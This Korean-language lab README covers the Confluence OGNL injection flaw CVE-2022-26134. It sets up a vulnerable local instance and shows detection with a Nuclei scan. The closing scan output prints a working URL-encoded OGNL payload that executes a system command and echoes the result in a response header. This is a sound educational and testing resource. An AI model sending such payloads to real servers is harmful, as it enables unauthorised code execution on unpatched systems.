CVE-2022-26134-LAB
Atlassian이 2022년 6월 2일에 공개한 보안 권고에 따르면, Confluence Server 및 Confluence Data Center에는 CVE-2022-26134로 식별되는 중대한 인증되지 않은 원격 코드 실행 취약점이 포함되어 있습니다. 이 취약점은 6월 2일 공개 당시 패치되지 않은 상태였으며 실제 환경에서 악용되고 있었습니다. 6월 3일 현재 패치와 임시 해결 방법이 모두 제공됩니다.
이 저장소는 실험 및 교육 목적으로만 제공됩니다.
종속 항목
취약한 Confluence 환경
취약한 환경 실행
시작된 후에는 다음 URL 주소로 Confluence 서버에 접근할 수 있습니다.
http://127.0.0.1:8090/
Confluence Server 설정
- 사이트를 처음 방문하면 설정 과정을 진행하게 됩니다.
- 'Get apps' 페이지에서 아무 항목도 선택하지 말고 'Next'를 클릭하세요.
- 라이선스 키 페이지에서 'Get an evaluation license' 링크를 클릭하세요.
- my.atlassian.com으로 리디렉션됩니다. 선택된 라이선스 유형이 Confluence (Data Center)인지 확인하세요. 원하는 조직 이름을 입력하세요. 'Your instance is' 라디오 버튼이 'up and running'으로 선택되어 있는지 확인하세요. 세부 사항을 확인했으면 'Generate License' 버튼을 클릭하세요.
- 서버 127.0.0.1에 설치할지 묻는 확인 모달이 나타납니다. 'Yes'를 선택하세요.
- 'Yes'를 선택하면 로컬 Confluence 인스턴스에 라이선스 키가 자동으로 입력됩니다. 'Next'를 선택하세요.
- 배포 유형으로 'Standalone'을 선택하고 'Next'를 선택하세요.
- 데이터베이스 설정 페이지에서 다음 세부 정보를 입력해야 합니다:
- 데이터베이스 유형: PostgreSQL
- 설정 유형: Simple
- 호스트 이름: db
- 포트: 5432
- 데이터베이스 이름: confluence
- 사용자 이름: confluence
- 비밀번호: 123456789
- 이 필드를 입력한 후 'Test connection' 버튼을 누르세요. 'Success! Database connected successfully' 메시지가 표시되어야 합니다. 그런 다음 'Next'를 클릭하세요.
- 데이터베이스 설정이 시작됩니다. 시간이 조금 걸릴 수 있습니다. 잠시만 기다리세요.
- 데이터베이스 설정이 완료되면 'Load Content' 페이지가 표시됩니다. 'Example Site' 버튼을 선택하세요.
- 다음으로 'Configure User Management' 페이지에서 'Manage users and groups with Confluence'를 선택하세요.
- 다음 'Configure System Administrator Account' 페이지에서 계정을 만들고 'Next'를 선택하세요.
- 완료되면 설정이 성공적으로 완료되었다는 메시지가 표시됩니다. 'Start'를 누르세요.
- 'Create a space to store your work'를 요청할 것입니다. 원하는 Space 이름을 입력하세요.
- 튜토리얼을 건너뛰세요.
- 이제 Confluence Server의 평가판 설정을 완료했습니다.
CVE-2022-26134 탐지
이 취약점은 HTTP 서버에 영향을 미치는 OGNL 인젝션 취약점입니다. OGNL 페이로드는 HTTP 요청의 URI에 배치됩니다. 유효한(GET, POST, PUT 등) 또는 유효하지 않은(예: “BALH”) 모든 유형의 HTTP 메서드가 작동하는 것으로 보입니다.
https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
Nuclei 사용
다음 Nuclei 명령을 실행하세요:
nuclei -u http://127.0.0.1:8090 -t nuclei-templates/cves/2022/CVE-2022-26134.yaml
스캔 출력
[CVE-2022-26134] [http] [critical] http://127.0.0.1:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ [confluence]